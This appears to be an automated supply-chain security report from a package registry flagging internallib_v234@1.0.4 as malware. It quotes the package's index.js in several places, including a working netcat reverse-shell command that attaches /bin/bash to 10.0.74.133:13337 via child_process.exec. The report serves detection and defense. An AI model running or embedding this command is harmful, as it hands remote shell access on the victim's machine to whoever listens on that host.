registry  /  internallib_v234  /  1.0.4

internallib_v234@1.0.4

AI Security Review

scanned 5h ago · by lpm-firewall-ai

The package exposes a function that launches a netcat reverse shell to a hardcoded private IP and port. A bundled check.js demonstrates calling the exported function.

Static reason
High-risk behavior combination matched malicious policy.; source fingerprint signature matched known malicious package; routed for review
Trigger
runtime call to exports.command()
Impact
remote shell access as the invoking user if command() is called in an environment where the endpoint is reachable
Mechanism
child_process.exec launches netcat with /bin/bash attached
Attack narrative
When a consumer calls command(), index.js logs a marker and executes /bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash" via child_process.exec. This attaches an interactive shell to a network connection, giving the listener command execution as the package user if reachable.
Rationale
Direct source inspection confirms concrete reverse-shell behavior in the package main entrypoint, with check.js showing a caller path. Lack of lifecycle execution reduces automatic trigger scope but does not make the exported remote shell benign.
Evidence
index.jscheck.jspackage.json/bin/bash
Network endpoints1
10.0.74.133:13337

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js imports child_process.exec.
  • index.js exports command() that runs /bin/bash -c with nc reverse shell.
  • index.js connects to 10.0.74.133:13337 and passes -e /bin/bash.
  • check.js requires internallib_v234 and calls internallib.command().
Evidence against
  • package.json has no install/preinstall/postinstall lifecycle hooks.
  • Behavior is not import-time; exported command() must be invoked.
Behavioral surface
Source
ChildProcessShell
Supply chain
Trivial
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 261 B of source

Source & flagged code

5 flagged · loading source
index.jsView file
1const { exec } = require('child_process'); L2: ... L4: console.log("vert16x"); L5: exec('/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"'); L6: return "deu bom";
Critical
Reverse Shell

Source matches reverse-shell style process and socket wiring.

index.jsView on unpkg · L1
1Trigger-reachable chain: manifest.main -> index.js L1: const { exec } = require('child_process'); L2: ... L4: console.log("vert16x"); L5: exec('/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"'); L6: return "deu bom";
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.jsView on unpkg · L1
1const { exec } = require('child_process'); L2:
High
Child Process

Package source references child process execution.

index.jsView on unpkg · L1
4console.log("vert16x"); L5: exec('/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"'); L6: return "deu bom";
High
Shell

Package source references shell execution.

index.jsView on unpkg · L4
matchType = malicious_source_fingerprint_signature signature = e65a49ea38f1fe3e signatureType = suspicious_hashes sourceLabel = Datadog matchedPackage = internallib_v730@1.0.4 matchedPath = index.js matchedIdentity = npm:aW50ZXJuYWxsaWJfdjczMA:1.0.4 similarity = 1.000 shingleOverlap = 2 summary = Datadog malicious npm corpus sample: samples/npm/malicious_intent/internallib_v730/1.0.4/2025-07-07-internallib_v730-v1.0.4.zip
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg

Findings

2 Critical3 High1 Low
CriticalReverse Shellindex.js
CriticalTrigger Reachable Dangerous Capabilityindex.js
HighChild Processindex.js
HighShellindex.js
HighKnown Malware Source Fingerprint Signatureindex.js
LowScripts Present